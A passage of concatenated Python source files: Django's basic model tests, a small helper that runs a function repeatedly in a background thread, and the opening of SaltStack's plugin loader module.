from django.db.models.manager import BaseManager
from django.db.models.query import EmptyQuerySet, QuerySet
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.utils import six
from django.utils.translation import ugettext_lazy
from .models import Article, ArticleSelectOnSave, SelfRef
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
six.assertRaisesRegex(
self,
TypeError,
"'foo' is an invalid keyword argument for this function",
Article,
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertNotEqual(a.id, None)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date,
datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Parrot programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
six.assertRaisesRegex(
self,
AttributeError,
"Manager isn't accessible via Article instances",
getattr,
Article(),
"objects",
)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"])
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'),
["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
@skipUnlessDBFeature('supports_microsecond_precision')
def test_microsecond_precision(self):
# In PostgreSQL, microsecond-level precision is available.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date,
datetime(2005, 7, 31, 12, 30, 45, 180))
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(
Article.objects.get(id__exact=a9.id).pub_date,
datetime(2005, 7, 31, 12, 30, 45),
)
@skipIfDBFeature('supports_microsecond_precision')
def test_microsecond_precision_not_supported_edge_case(self):
# In MySQL, microsecond-level precision isn't always available. You'll
# lose microsecond-level precision once the data is saved.
a = Article.objects.create(
headline='Article',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertEqual(
Article.objects.get(pk=a.pk).pub_date,
datetime(2008, 12, 31, 23, 59, 59),
)
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"])
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline,
'\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_field_ordering(self):
"""
Field instances have a `__lt__` comparison function to define an
ordering based on their creation. Prior to #17851 this ordering
comparison relied on the now unsupported `__cmp__` and was assuming
compared objects were both Field instances raising `AttributeError`
when it should have returned `NotImplemented`.
"""
f1 = Field()
f2 = Field(auto_created=True)
f3 = Field()
self.assertLess(f2, f1)
self.assertGreater(f3, f1)
self.assertIsNotNone(f1)
self.assertNotIn(f2, (None, 1, ''))
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual([sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]])
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_ugettext_lazy(self):
"""
Test that ugettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = ugettext_lazy(notlazy)
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
# Can't be instantiated
with self.assertRaises(TypeError):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
a = Article()
self.assertEqual(a, a)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
with self.assertRaises(TypeError):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
class ModelLookupTest(TestCase):
def setUp(self):
# Create an Article.
self.a = Article(
id=None,
headline='Swallow programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
self.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Parrot programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(),
['<Article: Parrot programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
id__exact=2000,
)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
self.assertRaises(
ObjectDoesNotExist,
Article.objects.get,
pub_date__year=2005,
pub_date__month=8,
)
six.assertRaisesRegex(
self,
ObjectDoesNotExist,
"Article matching query does not exist.",
Article.objects.get,
pub_date__week_day=6,
)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]),
["<Article: Swallow programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Swallow bites Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
headline__startswith='Swallow',
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
)
six.assertRaisesRegex(
self,
MultipleObjectsReturned,
"get\(\) returned more than one Article -- it returned 2!",
Article.objects.get,
pub_date__year=2005,
pub_date__month=7,
)
class ConcurrentSaveTests(TransactionTestCase):
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(SimpleTestCase):
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'_insert',
'_update',
'raw',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet).keys()),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(2):
asos.save()
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
with self.assertRaises(DatabaseError):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
Test that select_on_save works correctly if the database
doesn't return correct information about matched rows from
UPDATE.
"""
# Change the manager to not return "row matched" for update().
# We are going to change the Article's _base_manager class
# dynamically. This is a bit of a hack, but it seems hard to
# test this properly otherwise. Article's manager, because
# proxy models use their parent model's _base_manager.
orig_class = Article._base_manager.__class__
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super(FakeQuerySet, self)._update(*args, **kwargs)
return 0
class FakeManager(orig_class):
def get_queryset(self):
return FakeQuerySet(self.model)
try:
Article._base_manager.__class__ = FakeManager
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaises(DatabaseError):
asos.save(force_update=True)
with self.assertRaises(DatabaseError):
asos.save(update_fields=['pub_date'])
finally:
Article._base_manager.__class__ = orig_class
class ModelRefreshTests(TestCase):
def _truncate_ms(self, val):
# MySQL < 5.6.4 removes microseconds from the datetimes which can cause
# problems when comparing the original value to that loaded from DB
return val - timedelta(microseconds=val.microsecond)
def test_refresh(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
Article.objects.filter(pk=a.pk).update(headline='new headline')
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = self._truncate_ms(datetime.now())
a = Article.objects.create(pub_date=pub_date)
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=self._truncate_ms(datetime.now()))
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
class TestRelatedObjectDeprecation(SimpleTestCase):
def test_field_related_deprecation(self):
field = SelfRef._meta.get_field('selfref')
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter('always')
self.assertIsInstance(field.related, ForeignObjectRel)
self.assertEqual(len(warns), 1)
self.assertEqual(
str(warns.pop().message),
'Usage of field.related has been deprecated. Use field.remote_field instead.'
)
|
thread.py
|
from __future__ import annotations
import traceback
from threading import Thread
from time import sleep
from typing import Callable
from tealprint import TealPrint
def start_thread(function: Callable, seconds_between_calls: float = 1, delay: float = 0) -> None:
"""Start a function in another thread as a daemon"""
thread = Thread(target=_run_forever, args=(function, seconds_between_calls, delay))
thread.start()
def _run_forever(function: Callable, seconds_between_calls: float, delay: float) -> None:
if delay > 0:
sleep(delay)
TealPrint.info(f"🧵 Started thread {function.__qualname__}")
while True:
try:
function()
except Exception:
trace = traceback.format_exc()
TealPrint.warning(f"⚠🧵 Error in thread {function.__qualname__}:\n{trace}")
if seconds_between_calls > 0:
sleep(seconds_between_calls)
|
loader.py
|
"""
The Salt loader is the core to Salt's plugin system, the loader scans
directories for python loadable code and organizes the code into the
plugin interfaces used by Salt.
"""
import contextvars
import copy
import functools
import importlib.machinery # pylint: disable=no-name-in-module,import-error
import importlib.util # pylint: disable=no-name-in-module,import-error
import inspect
import logging
import os
import re
import sys
import tempfile
import threading
import time
import traceback
import types
from collections.abc import MutableMapping
from zipimport import zipimporter
import salt.config
import salt.defaults.events
import salt.defaults.exitcodes
import salt.loader_context
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.lazy
import salt.utils.odict
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.versions
from salt.exceptions import LoaderError
from salt.ext import six
from salt.ext.six.moves import reload_module
from salt.template import check_render_pipe_str
from salt.utils.decorators import Depends
try:
import pkg_resources
HAS_PKG_RESOURCES = True
except ImportError:
HAS_PKG_RESOURCES = False
log = logging.getLogger(__name__)
SALT_BASE_PATH = os.path.abspath(salt.syspaths.INSTALL_DIR)
LOADED_BASE_NAME = "salt.loaded"
# pylint: disable=no-member
MODULE_KIND_SOURCE = 1
MODULE_KIND_COMPILED = 2
MODULE_KIND_EXTENSION = 3
MODULE_KIND_PKG_DIRECTORY = 5
SUFFIXES = []
for suffix in importlib.machinery.EXTENSION_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_EXTENSION))
for suffix in importlib.machinery.SOURCE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_SOURCE))
for suffix in importlib.machinery.BYTECODE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_COMPILED))
MODULE_KIND_MAP = {
MODULE_KIND_SOURCE: importlib.machinery.SourceFileLoader,
MODULE_KIND_COMPILED: importlib.machinery.SourcelessFileLoader,
MODULE_KIND_EXTENSION: importlib.machinery.ExtensionFileLoader,
}
# pylint: enable=no-member
PY3_PRE_EXT = re.compile(r"\.cpython-{}{}(\.opt-[1-9])?".format(*sys.version_info[:2]))
# Because on the cloud drivers we do `from salt.cloud.libcloudfuncs import *`
# which simplifies code readability, it adds some unsupported functions into
# the driver's module scope.
# We list un-supported functions here. These will be removed from the loaded.
# TODO: remove the need for this cross-module code. Maybe use NotImplemented
LIBCLOUD_FUNCS_NOT_SUPPORTED = (
"parallels.avail_sizes",
"parallels.avail_locations",
"proxmox.avail_sizes",
)
# Will be set to pyximport module at runtime if cython is enabled in config.
pyximport = None
def static_loader(
opts,
ext_type,
tag,
pack=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
filter_name=None,
):
funcs = LazyLoader(
_module_dirs(
opts, ext_type, tag, int_type, ext_dirs, ext_type_dirs, base_path,
),
opts,
tag=tag,
pack=pack,
)
ret = {}
funcs._load_all()
if filter_name:
funcs = FilterDictWrapper(funcs, filter_name)
for key in funcs:
ret[key] = funcs[key]
return ret
def _format_entrypoint_target(ep):
"""
Makes a string describing the target of an EntryPoint object.
Base strongly on EntryPoint.__str__().
"""
s = ep.module_name
if ep.attrs:
s += ":" + ".".join(ep.attrs)
return s
def _module_dirs(
opts,
ext_type,
tag=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
):
if tag is None:
tag = ext_type
sys_types = os.path.join(base_path or SALT_BASE_PATH, int_type or ext_type)
ext_types = os.path.join(opts["extension_modules"], ext_type)
ext_type_types = []
if ext_dirs:
if ext_type_dirs is None:
ext_type_dirs = "{}_dirs".format(tag)
if ext_type_dirs in opts:
ext_type_types.extend(opts[ext_type_dirs])
if HAS_PKG_RESOURCES and ext_type_dirs:
for entry_point in pkg_resources.iter_entry_points(
"salt.loader", ext_type_dirs
):
try:
loaded_entry_point = entry_point.load()
for path in loaded_entry_point():
ext_type_types.append(path)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Error getting module directories from %s: %s",
_format_entrypoint_target(entry_point),
exc,
)
log.debug(
"Full backtrace for module directories error", exc_info=True
)
cli_module_dirs = []
# The dirs can be any module dir, or a in-tree _{ext_type} dir
for _dir in opts.get("module_dirs", []):
# Prepend to the list to match cli argument ordering
maybe_dir = os.path.join(_dir, ext_type)
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
continue
maybe_dir = os.path.join(_dir, "_{}".format(ext_type))
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
return cli_module_dirs + ext_type_types + [ext_types, sys_types]
def minion_mods(
opts,
context=None,
utils=None,
whitelist=None,
initial_load=False,
loaded_base_name=None,
notify=False,
static_modules=None,
proxy=None,
):
"""
Load execution modules
Returns a dictionary of execution modules appropriate for the current
system by evaluating the __virtual__() function in each module.
:param dict opts: The Salt options dictionary
:param dict context: A Salt context that should be made present inside
generated modules in __context__
:param dict utils: Utility functions which should be made available to
Salt modules in __utils__. See `utils_dirs` in
salt.config for additional information about
configuration.
:param list whitelist: A list of modules which should be whitelisted.
:param bool initial_load: Deprecated flag! Unused.
:param str loaded_base_name: A string marker for the loaded base name.
:param bool notify: Flag indicating that an event should be fired upon
completion of module loading.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
__opts__['grains'] = __grains__
__utils__ = salt.loader.utils(__opts__)
__salt__ = salt.loader.minion_mods(__opts__, utils=__utils__)
__salt__['test.ping']()
"""
# TODO Publish documentation for module whitelisting
if not whitelist:
whitelist = opts.get("whitelist_modules", None)
ret = LazyLoader(
_module_dirs(opts, "modules", "module"),
opts,
tag="module",
pack={"__context__": context, "__utils__": utils, "__proxy__": proxy},
whitelist=whitelist,
loaded_base_name=loaded_base_name,
static_modules=static_modules,
extra_module_dirs=utils.module_dirs if utils else None,
pack_self="__salt__",
)
# Load any provider overrides from the configuration file providers option
# Note: Providers can be pkg, service, user or group - not to be confused
# with cloud providers.
providers = opts.get("providers", False)
if providers and isinstance(providers, dict):
for mod in providers:
# sometimes providers opts is not to diverge modules but
# for other configuration
try:
funcs = raw_mod(opts, providers[mod], ret)
except TypeError:
break
else:
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
ret[f_key] = funcs[func]
if notify:
with salt.utils.event.get_event("minion", opts=opts, listen=False) as evt:
evt.fire_event(
{"complete": True}, tag=salt.defaults.events.MINION_MOD_REFRESH_COMPLETE
)
return ret
def raw_mod(opts, name, functions, mod="modules"):
"""
Returns a single module loaded raw and bypassing the __virtual__ function
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
testmod = salt.loader.raw_mod(__opts__, 'test', None)
testmod['test.ping']()
"""
loader = LazyLoader(
_module_dirs(opts, mod, "module"),
opts,
tag="rawmodule",
virtual_enable=False,
pack={"__salt__": functions},
)
# if we don't have the module, return an empty dict
if name not in loader.file_mapping:
return {}
loader._load_module(name) # load a single module (the one passed in)
return dict(loader._dict) # return a copy of *just* the funcs for `name`
def metaproxy(opts, loaded_base_name=None):
"""
Return functions used in the meta proxy
"""
return LazyLoader(
_module_dirs(opts, "metaproxy"),
opts,
tag="metaproxy",
loaded_base_name=loaded_base_name,
)
def matchers(opts):
"""
Return the matcher services plugins
"""
return LazyLoader(_module_dirs(opts, "matchers"), opts, tag="matchers")
def engines(opts, functions, runners, utils, proxy=None):
"""
Return the master services plugins
"""
pack = {
"__salt__": functions,
"__runners__": runners,
"__proxy__": proxy,
"__utils__": utils,
}
return LazyLoader(
_module_dirs(opts, "engines"),
opts,
tag="engines",
pack=pack,
extra_module_dirs=utils.module_dirs if utils else None,
)
def proxy(
opts,
functions=None,
returners=None,
whitelist=None,
utils=None,
context=None,
pack_self="__proxy__",
):
"""
Returns the proxy module for this salt-proxy-minion
"""
return LazyLoader(
_module_dirs(opts, "proxy"),
opts,
tag="proxy",
pack={
"__salt__": functions,
"__ret__": returners,
"__utils__": utils,
"__context__": context,
},
extra_module_dirs=utils.module_dirs if utils else None,
pack_self=pack_self,
)
def returners(opts, functions, whitelist=None, context=None, proxy=None):
"""
Returns the returner modules
"""
return LazyLoader(
_module_dirs(opts, "returners", "returner"),
opts,
tag="returner",
whitelist=whitelist,
pack={"__salt__": functions, "__context__": context, "__proxy__": proxy or {}},
)
